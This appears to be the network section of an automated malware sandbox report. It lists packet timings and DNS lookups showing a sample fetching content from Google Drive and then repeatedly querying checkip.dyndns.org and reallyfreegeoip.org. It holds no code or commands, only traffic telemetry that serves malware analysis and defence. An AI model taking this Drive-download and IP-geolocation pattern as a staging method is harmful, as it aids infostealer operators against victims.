                                                                  Jan 10, 2025 16:02:43.731882095 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.731946945 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.731952906 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732006073 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732021093 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.732029915 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732053041 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.732095957 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.732183933 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732234955 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.732256889 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732312918 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.732543945 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.732595921 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.735228062 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.735294104 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.735305071 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.735327005 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.735343933 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.735373020 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.740611076 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.740704060 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.740710020 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.740761995 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.746136904 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.746198893 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.746220112 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.746294975 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.751146078 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.751229048 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.751236916 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.751329899 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.756072044 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.756285906 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.756292105 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.756354094 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.760694981 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.760751009 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.760762930 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.760838032 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.765340090 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.765531063 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.765537024 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.765650034 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.770008087 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.770062923 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.770075083 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.770116091 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.774615049 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.774713993 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.774719000 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.774872065 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.780793905 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.780862093 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.780867100 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.780985117 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.783920050 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.784486055 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.784492970 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.784548044 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.788237095 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.788311005 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.788399935 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.788558006 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.792373896 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.792418957 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.792429924 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.792470932 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.792475939 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.792552948 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.796801090 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.797013044 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.797019005 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.797100067 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.800550938 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.800610065 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.800614119 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.800699949 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.804294109 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.804342031 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.804389000 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.804445982 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.807949066 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.808142900 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.808150053 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.808342934 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.811628103 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.811690092 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.811738014 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.811849117 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.815309048 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.815361023 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.815366983 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.815464020 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.818737030 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.818839073 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.820565939 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.820828915 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.822227955 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.822269917 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.822280884 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.822393894 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.824595928 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.824639082 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.824651957 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.824795008 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.826822996 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.826932907 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.826947927 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.827104092 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.828851938 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.828989029 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.828994989 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.829046011 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.831181049 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.831275940 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.831283092 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.831326962 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.833306074 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.833415031 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.833420992 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.833465099 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.835366011 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.835436106 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.835458994 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.835639000 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.837399006 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.837476969 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.837495089 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.837546110 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.837716103 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.837770939 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.837837934 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:44.059257984 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:44.064033985 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:44.064129114 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:44.064332008 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:44.069190979 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:44.713593960 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:44.716928005 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:44.721767902 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:44.911041975 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:44.961622000 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:45.691181898 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:45.691221952 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:45.691293955 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:45.694020033 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:45.694039106 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.156857014 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.156919003 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.160164118 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.160171986 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.160515070 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.163613081 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.207324982 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.309674978 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.309731007 CET44349909104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.309799910 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.319016933 CET49909443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.331145048 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:46.335961103 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:46.539545059 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:46.541692972 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.541757107 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.541851997 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.542160034 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:46.542171001 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:46.586582899 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.016850948 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.022161007 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.022181034 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.164758921 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.164825916 CET44349915104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.168539047 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.168780088 CET49915443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.171710968 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.172641039 CET4992180192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.176686049 CET8049897193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:47.177423000 CET8049921193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:47.177499056 CET4989780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.177516937 CET4992180192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.177603006 CET4992180192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:47.182343006 CET8049921193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:47.813488007 CET8049921193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:47.815135956 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.815180063 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.815246105 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.815490007 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:47.815500975 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:47.867820978 CET4992180192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:48.273025036 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:48.274626017 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:48.274658918 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:48.406317949 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:48.406388044 CET44349924104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:48.406433105 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:48.406763077 CET49924443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:48.411449909 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:48.416240931 CET8049927193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:48.416296959 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:48.416366100 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:48.421072960 CET8049927193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:49.053034067 CET8049927193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:49.069580078 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.069619894 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.069703102 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.069994926 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.070018053 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.102165937 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.543239117 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.544891119 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.544919968 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.686618090 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.686692953 CET44349933104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:49.688232899 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.689953089 CET49933443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:49.691812992 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.693016052 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.698108912 CET8049927193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:49.698179960 CET4992780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.698425055 CET8049939193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:49.700997114 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.700997114 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:49.708266973 CET8049939193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:50.338061094 CET8049939193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:50.341738939 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:50.341785908 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:50.341845036 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:50.342071056 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:50.342081070 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:50.383682013 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:50.951164007 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:50.952862978 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:50.952903986 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:51.116197109 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:51.116271973 CET44349945104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:51.116342068 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:51.116733074 CET49945443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:51.126861095 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:51.127532959 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:51.132397890 CET8049939193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:51.132441044 CET8049947193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:51.132473946 CET4993980192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:51.132520914 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:51.132606983 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:51.137551069 CET8049947193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:51.790949106 CET8049947193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:51.792366982 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:51.792399883 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:51.792540073 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:51.792855978 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:51.792865038 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:51.836544991 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.256537914 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:52.258295059 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:52.258326054 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:52.392947912 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:52.393018007 CET44349953104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:52.393079996 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:52.393481970 CET49953443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:52.397104979 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.398332119 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.402112961 CET8049947193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:52.402215958 CET4994780192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.403156996 CET8049958193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:52.403238058 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.403361082 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:52.408103943 CET8049958193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:53.047909021 CET8049958193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:53.049195051 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.049228907 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.049294949 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.049556017 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.049566984 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.102123022 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.505831003 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.507652998 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.507711887 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.657702923 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.657763004 CET44349964104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:53.657812119 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.658175945 CET49964443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:53.661393881 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.662672997 CET4997080192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.666373014 CET8049958193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:53.666421890 CET4995880192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.667515993 CET8049970193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:53.667578936 CET4997080192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.667634010 CET4997080192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:53.672357082 CET8049970193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:54.297077894 CET8049970193.122.6.168192.168.2.9
                                                                  Jan 10, 2025 16:02:54.298239946 CET49974443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:54.298302889 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.298391104 CET49974443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:54.298625946 CET49974443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:54.298641920 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.352190018 CET4997080192.168.2.9193.122.6.168
                                                                  Jan 10, 2025 16:02:54.752001047 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.753742933 CET49974443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:54.753761053 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.887115955 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.887223005 CET44349974104.21.112.1192.168.2.9
                                                                  Jan 10, 2025 16:02:54.887392998 CET49974443192.168.2.9104.21.112.1
                                                                  Jan 10, 2025 16:02:54.887778044 CET49974443192.168.2.9104.21.112.1
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 16:02:39.047142029 CET4936153192.168.2.91.1.1.1
                                                                  Jan 10, 2025 16:02:39.053690910 CET53493611.1.1.1192.168.2.9
                                                                  Jan 10, 2025 16:02:40.183206081 CET5441253192.168.2.91.1.1.1
                                                                  Jan 10, 2025 16:02:40.190017939 CET53544121.1.1.1192.168.2.9
                                                                  Jan 10, 2025 16:02:44.048367023 CET5926453192.168.2.91.1.1.1
                                                                  Jan 10, 2025 16:02:44.055475950 CET53592641.1.1.1192.168.2.9
                                                                  Jan 10, 2025 16:02:45.683180094 CET6088253192.168.2.91.1.1.1
                                                                  Jan 10, 2025 16:02:45.690382004 CET53608821.1.1.1192.168.2.9
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 16:02:39.047142029 CET192.168.2.91.1.1.10x9c32Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:40.183206081 CET192.168.2.91.1.1.10xd79fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.048367023 CET192.168.2.91.1.1.10x728bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:45.683180094 CET192.168.2.91.1.1.10xa9b6Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Jan 10, 2025 16:02:39.053690910 CET1.1.1.1192.168.2.90x9c32No error (0)drive.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:40.190017939 CET1.1.1.1192.168.2.90xd79fNo error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                  Jan 10, 2025 16:02:44.055475950 CET1.1.1.1192.168.2.90x728bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
